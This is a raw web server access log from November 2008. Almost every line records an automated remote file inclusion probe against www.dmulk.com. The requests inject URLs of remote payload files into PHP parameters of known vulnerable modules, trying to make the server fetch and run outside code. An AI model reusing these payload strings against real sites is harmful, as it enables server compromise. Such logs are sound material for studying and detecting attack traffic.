67.76.163.60 - - [10/Nov/2008:09:01:40 -0800] "GET /logs/access_080329.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.minorleaguesportsfans.com//plugins/safehtml/gif/blast.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.76.163.60 - - [10/Nov/2008:09:01:41 -0800] "GET /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.minorleaguesportsfans.com//plugins/safehtml/gif/blast.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.76.163.60 - - [10/Nov/2008:09:01:41 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.minorleaguesportsfans.com//plugins/safehtml/gif/blast.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.76.163.60 - - [10/Nov/2008:09:01:42 -0800] "GET /logs/access_080114.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.minorleaguesportsfans.com//plugins/safehtml/gif/blast.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
24.63.144.198 - - [10/Nov/2008:09:01:44 -0800] "GET /logs/access_080329.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.minorleaguesportsfans.com//plugins/safehtml/gif/blast.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
24.63.144.198 - - [10/Nov/2008:09:01:44 -0800] "GET /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.minorleaguesportsfans.com//plugins/safehtml/gif/blast.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
24.63.144.198 - - [10/Nov/2008:09:01:45 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.minorleaguesportsfans.com//plugins/safehtml/gif/blast.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
24.63.144.198 - - [10/Nov/2008:09:01:45 -0800] "GET /logs/access_080114.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.minorleaguesportsfans.com//plugins/safehtml/gif/blast.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.198.54.67 - - [10/Nov/2008:09:02:06 -0800] "GET /logs/access_080708.log/display.php?page=http://www.helpcerto.com.br/~jmt/a.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
121.124.127.40 - - [10/Nov/2008:09:02:18 -0800] "GET /logs/access_080511.log/errors.php?error=http://www.300radio.com/sondage/image/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.167.0.5 - - [10/Nov/2008:09:02:18 -0800] "GET /logs/access_080329.log//modules/4nAlbum/public/displayCategory.php?basepath=http://hellsrangersclan.com/modules/Album/daten.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.167.0.5 - - [10/Nov/2008:09:02:19 -0800] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://hellsrangersclan.com/modules/Album/daten.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.167.0.5 - - [10/Nov/2008:09:02:19 -0800] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://hellsrangersclan.com/modules/Album/daten.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.127.70.39 - - [10/Nov/2008:09:02:33 -0800] "GET /logs/access_081031.log//galeria.php?start=0&kategoria=http://sprula.kit.net/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.819" "www.dmulk.com"
75.127.70.39 - - [10/Nov/2008:09:02:33 -0800] "GET /logs//galeria.php?start=0&kategoria=http://sprula.kit.net/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.819" "www.dmulk.com"
75.127.70.39 - - [10/Nov/2008:09:02:33 -0800] "GET /galeria.php?start=0&kategoria=http://sprula.kit.net/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.819" "www.dmulk.com"
75.127.70.39 - - [10/Nov/2008:09:02:37 -0800] "GET /logs/access_081022.log//galeria.php?start=0&kategoria=http://sprula.kit.net/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.819" "www.dmulk.com"
85.214.37.182 - - [10/Nov/2008:09:02:49 -0800] "GET /logs//include/scripts/export_batch.inc.php?DIR=http://bentahan.com.ph//stores/bot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
85.214.37.182 - - [10/Nov/2008:09:02:49 -0800] "GET /include/scripts/export_batch.inc.php?DIR=http://bentahan.com.ph//stores/bot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
121.124.127.40 - - [10/Nov/2008:09:02:55 -0800] "GET /logs/access_080507.log/errors.php?error=http://www.300radio.com/sondage/image/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
121.124.127.40 - - [10/Nov/2008:09:02:55 -0800] "GET /errors.php?error=http://www.300radio.com/sondage/image/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
121.124.127.40 - - [10/Nov/2008:09:02:56 -0800] "GET /logs/errors.php?error=http://www.300radio.com/sondage/image/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.109.103.221 - - [10/Nov/2008:09:03:03 -0800] "GET /logs/access_080427.log/lostpasswd.php?env[include_prefix]=http://rfiscan.ucoz.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.109.103.221 - - [10/Nov/2008:09:03:04 -0800] "GET /lostpasswd.php?env[include_prefix]=http://rfiscan.ucoz.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.109.103.221 - - [10/Nov/2008:09:03:04 -0800] "GET /logs/lostpasswd.php?env[include_prefix]=http://rfiscan.ucoz.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.167.0.5 - - [10/Nov/2008:09:03:12 -0800] "GET /logs/access_080209.log//modules/4nAlbum/public/displayCategory.php?basepath=http://hellsrangersclan.com/modules/Album/daten.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
24.63.144.198 - - [10/Nov/2008:09:03:23 -0800] "GET /logs/access_080729.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.minorleaguesportsfans.com//plugins/safehtml/gif/blast.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.208.148.87 - - [10/Nov/2008:09:03:27 -0800] "GET /logs/access_080125.log%20%20//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://ideaindustry.us/content/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.208.148.87 - - [10/Nov/2008:09:03:27 -0800] "GET /logs/access_080118.log%20%20//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://ideaindustry.us/content/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.76.163.60 - - [10/Nov/2008:09:03:29 -0800] "GET /logs/access_080729.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.minorleaguesportsfans.com//plugins/safehtml/gif/blast.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
140.130.101.5 - - [10/Nov/2008:09:03:42 -0800] "GET /logs/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://ideaindustry.us/content/idfeel.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
140.130.101.5 - - [10/Nov/2008:09:03:42 -0800] "GET /component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://ideaindustry.us/content/idfeel.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
140.130.101.5 - - [10/Nov/2008:09:03:42 -0800] "GET /logs/access_080615.log/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://ideaindustry.us/content/idfeel.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
121.124.127.40 - - [10/Nov/2008:09:03:47 -0800] "GET /logs/access_080511.log/errors.php?error=http://www.300radio.com/sondage/image/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
140.130.101.5 - - [10/Nov/2008:09:03:49 -0800] "GET /logs/access_080523.log/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://ideaindustry.us/content/idfeel.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
203.146.15.54 - - [10/Nov/2008:09:03:51 -0800] "GET /logs/display.php?page=http://www.mfa.gov.bt/kethek-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.146.15.54 - - [10/Nov/2008:09:03:51 -0800] "GET /logs/access_080529.log/display.php?page=http://www.mfa.gov.bt/kethek-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.146.15.54 - - [10/Nov/2008:09:03:51 -0800] "GET /display.php?page=http://www.mfa.gov.bt/kethek-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
146.164.26.31 - - [10/Nov/2008:09:03:57 -0800] "GET /logs/access_080724.log/phphtml.php?htmlclass_path=http://skill-station.net/editor/loco.me.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
146.164.26.31 - - [10/Nov/2008:09:04:04 -0800] "GET /logs/access_080905.log/phphtml.php?htmlclass_path=http://skill-station.net/editor/loco.me.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
140.130.101.5 - - [10/Nov/2008:09:04:12 -0800] "GET /logs/access_080615.log/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://ideaindustry.us/content/idfx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
140.130.101.5 - - [10/Nov/2008:09:04:12 -0800] "GET /component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://ideaindustry.us/content/idfx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
140.130.101.5 - - [10/Nov/2008:09:04:12 -0800] "GET /logs/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://ideaindustry.us/content/idfx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
140.130.101.5 - - [10/Nov/2008:09:04:13 -0800] "GET /logs/access_080523.log/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://ideaindustry.us/content/idfx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
88.198.54.67 - - [10/Nov/2008:09:04:16 -0800] "GET /logs/access_080529.log/display.php?page=http://www.mfa.gov.bt/kethek-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
88.198.54.67 - - [10/Nov/2008:09:04:16 -0800] "GET /display.php?page=http://www.mfa.gov.bt/kethek-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
88.198.54.67 - - [10/Nov/2008:09:04:17 -0800] "GET /logs/display.php?page=http://www.mfa.gov.bt/kethek-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
89.111.176.122 - - [10/Nov/2008:09:04:20 -0800] "GET /logs/access_080828.log/op=*year=*month=/s_loadenv.inc.php?DOCUMENT_ROOT=http://www.jjran.com/board/skin/zero_vote/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.122 - - [10/Nov/2008:09:04:20 -0800] "GET /op=*year=*month=/s_loadenv.inc.php?DOCUMENT_ROOT=http://www.jjran.com/board/skin/zero_vote/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.122 - - [10/Nov/2008:09:04:20 -0800] "GET /logs/op=*year=*month=/s_loadenv.inc.php?DOCUMENT_ROOT=http://www.jjran.com/board/skin/zero_vote/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
140.130.101.5 - - [10/Nov/2008:09:04:27 -0800] "GET /component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://ideaindustry.us/content/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
140.130.101.5 - - [10/Nov/2008:09:04:27 -0800] "GET /logs/access_080615.log/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://ideaindustry.us/content/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
140.130.101.5 - - [10/Nov/2008:09:04:27 -0800] "GET /logs/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://ideaindustry.us/content/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
140.130.101.5 - - [10/Nov/2008:09:04:27 -0800] "GET /logs/access_080523.log/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://ideaindustry.us/content/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
88.198.54.67 - - [10/Nov/2008:09:04:44 -0800] "GET /logs/access_080708.log/display.php?page=http://www.mfa.gov.bt/kethek-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
89.111.176.122 - - [10/Nov/2008:09:04:49 -0800] "GET /logs/access_080712.log/op=*year=*month=/s_loadenv.inc.php?DOCUMENT_ROOT=http://www.jjran.com/board/skin/zero_vote/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.146.15.54 - - [10/Nov/2008:09:04:58 -0800] "GET /logs/access_080708.log/display.php?page=http://www.mfa.gov.bt/kethek-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.122 - - [10/Nov/2008:09:05:45 -0800] "GET /op=*year=*month=/s_loadenv.inc.php?DOCUMENT_ROOT=http://www.jjran.com/board/skin/zero_vote/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.76.68.90 - - [10/Nov/2008:09:06:33 -0800] "GET /logs/access_080304.log//?path%5Bdocroot%5D=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.76.68.90 - - [10/Nov/2008:09:06:36 -0800] "GET /?path%5Bdocroot%5D=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 200 94973 "-" "libwww-perl/5.79" "www.dmulk.com"
212.76.68.90 - - [10/Nov/2008:09:06:40 -0800] "GET /logs//?path%5Bdocroot%5D=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 200 73026 "-" "libwww-perl/5.79" "www.dmulk.com"
212.76.68.90 - - [10/Nov/2008:09:06:43 -0800] "GET /logs/access_080430.log//?path%5Bdocroot%5D=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.76.137.5 - - [10/Nov/2008:09:06:51 -0800] "GET /logs/access_080427.log/lostpasswd.php?env[include_prefix]=http://rfiscan.ucoz.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.801" "www.dmulk.com"
211.76.137.5 - - [10/Nov/2008:09:06:55 -0800] "GET /lostpasswd.php?env[include_prefix]=http://rfiscan.ucoz.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.801" "www.dmulk.com"
211.76.137.5 - - [10/Nov/2008:09:06:56 -0800] "GET /logs/lostpasswd.php?env[include_prefix]=http://rfiscan.ucoz.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.801" "www.dmulk.com"
67.19.122.234 - - [10/Nov/2008:09:08:56 -0800] "GET /logs/access_080515.log/errors.php?error=http://www.spyoneradio.fr/idfx.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
67.19.122.234 - - [10/Nov/2008:09:08:56 -0800] "GET /errors.php?error=http://www.spyoneradio.fr/idfx.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
67.19.122.234 - - [10/Nov/2008:09:08:56 -0800] "GET /logs/errors.php?error=http://www.spyoneradio.fr/idfx.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
202.214.193.212 - - [10/Nov/2008:09:08:59 -0800] "GET /logs/access_080504.log//admin/classes/TplLoad.php?full_path_to_public_program=http://shoppingcause.com/tst.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
202.214.193.212 - - [10/Nov/2008:09:08:59 -0800] "GET /admin/classes/TplLoad.php?full_path_to_public_program=http://shoppingcause.com/tst.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
202.214.193.212 - - [10/Nov/2008:09:09:18 -0800] "GET /logs/access_081026.log//admin/classes/TplLoad.php?full_path_to_public_program=http://shoppingcause.com/tst.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
140.130.101.5 - - [10/Nov/2008:09:09:40 -0800] "GET /logs/access_080615.log%20%20/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://ideaindustry.us/content/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
140.130.101.5 - - [10/Nov/2008:09:09:40 -0800] "GET /logs/access_080523.log%20%20/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://ideaindustry.us/content/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.201.13.207 - - [10/Nov/2008:09:09:44 -0800] "GET /logs/access_080927.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.genesis-auctions.com/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
67.201.13.207 - - [10/Nov/2008:09:09:45 -0800] "GET /logs/access_080927.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.genesis-auctions.com/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
66.135.37.24 - - [10/Nov/2008:09:09:50 -0800] "GET /logs/access_081007.log//index_for.php?classified_path=http://www.efeyl.org/wiki/backups/sp.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.135.37.24 - - [10/Nov/2008:09:09:50 -0800] "GET /logs//index_for.php?classified_path=http://www.efeyl.org/wiki/backups/sp.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.135.37.24 - - [10/Nov/2008:09:09:50 -0800] "GET /index_for.php?classified_path=http://www.efeyl.org/wiki/backups/sp.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.135.37.24 - - [10/Nov/2008:09:09:56 -0800] "GET /logs/access_080826.log//index_for.php?classified_path=http://www.efeyl.org/wiki/backups/sp.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.13.222.135 - - [10/Nov/2008:09:10:01 -0800] "GET /logs/display.php?page=http://83.12.246.234/~jarek/galeria/stats.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.222.135 - - [10/Nov/2008:09:10:01 -0800] "GET /logs/access_080708.log%20/display.php?page=http://83.12.246.234/~jarek/galeria/stats.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.222.135 - - [10/Nov/2008:09:10:01 -0800] "GET /display.php?page=http://83.12.246.234/~jarek/galeria/stats.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
88.198.54.67 - - [10/Nov/2008:09:10:02 -0800] "GET /logs/access_080708.log%20/display.php?page=http://www.mfa.gov.bt/kethek-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
67.19.122.234 - - [10/Nov/2008:09:10:06 -0800] "GET /logs/access_080824.log/errors.php?error=http://www.spyoneradio.fr/idfx.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
74.52.142.10 - - [10/Nov/2008:09:10:07 -0800] "GET /errors.php?error=http://www.rupkalwis.com/includes/r.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
163.30.131.2 - - [10/Nov/2008:09:10:22 -0800] "GET /logs/access_080708.log%20/display.php?page=http://69amigas.com/chat/chat/localization/spanish/echo.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
163.30.131.2 - - [10/Nov/2008:09:10:22 -0800] "GET /logs/display.php?page=http://69amigas.com/chat/chat/localization/spanish/echo.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
163.30.131.2 - - [10/Nov/2008:09:10:22 -0800] "GET /display.php?page=http://69amigas.com/chat/chat/localization/spanish/echo.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.214.193.212 - - [10/Nov/2008:09:10:29 -0800] "GET /logs/access_080329.log//admin/classes/TplLoad.php?full_path_to_public_program=http://shoppingcause.com/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.214.193.212 - - [10/Nov/2008:09:10:29 -0800] "GET /admin/classes/TplLoad.php?full_path_to_public_program=http://shoppingcause.com/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.214.193.212 - - [10/Nov/2008:09:10:29 -0800] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://shoppingcause.com/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.62.6.200 - - [10/Nov/2008:09:10:31 -0800] "GET /logs/access_080224.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.splendidpicnic.com/tst.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
209.62.6.200 - - [10/Nov/2008:09:10:31 -0800] "GET /modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.splendidpicnic.com/tst.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
65.55.211.25 - - [10/Nov/2008:09:10:37 -0800] "GET /blog/?D=A HTTP/1.1" 200 94266 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "dmulk.com"
212.76.68.90 - - [10/Nov/2008:09:10:39 -0800] "GET /?path%5Bdocroot%5D=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 200 95005 "-" "libwww-perl/5.79" "www.dmulk.com"
202.214.193.212 - - [10/Nov/2008:09:10:39 -0800] "GET /logs/access_080504.log//admin/classes/TplLoad.php?full_path_to_public_program=http://shoppingcause.com/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.62.6.200 - - [10/Nov/2008:09:10:49 -0800] "GET /logs/access_080224.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.splendidpicnic.com/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
209.62.6.200 - - [10/Nov/2008:09:10:49 -0800] "GET /modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.splendidpicnic.com/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
209.62.6.200 - - [10/Nov/2008:09:10:49 -0800] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.splendidpicnic.com/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.19.122.234 - - [10/Nov/2008:09:11:08 -0800] "GET /logs/access_080515.log/errors.php?error=http://myypaa.org/templates/base/css/idFeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
67.19.122.234 - - [10/Nov/2008:09:11:08 -0800] "GET /errors.php?error=http://myypaa.org/templates/base/css/idFeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
67.19.122.234 - - [10/Nov/2008:09:11:08 -0800] "GET /logs/errors.php?error=http://myypaa.org/templates/base/css/idFeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
209.62.6.200 - - [10/Nov/2008:09:11:14 -0800] "GET /logs/access_080406.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.splendidpicnic.com/tst.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
88.198.54.67 - - [10/Nov/2008:09:11:19 -0800] "GET /logs/access_080831.log/index1.php?inc=http://www.helpcerto.com.br/~jmt/a.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
88.198.54.67 - - [10/Nov/2008:09:11:19 -0800] "GET /index1.php?inc=http://www.helpcerto.com.br/~jmt/a.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
88.198.54.67 - - [10/Nov/2008:09:11:19 -0800] "GET /logs/index1.php?inc=http://www.helpcerto.com.br/~jmt/a.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
70.38.38.230 - - [10/Nov/2008:09:11:21 -0800] "GET /logs/access_080329.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.wutangcorp.de/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
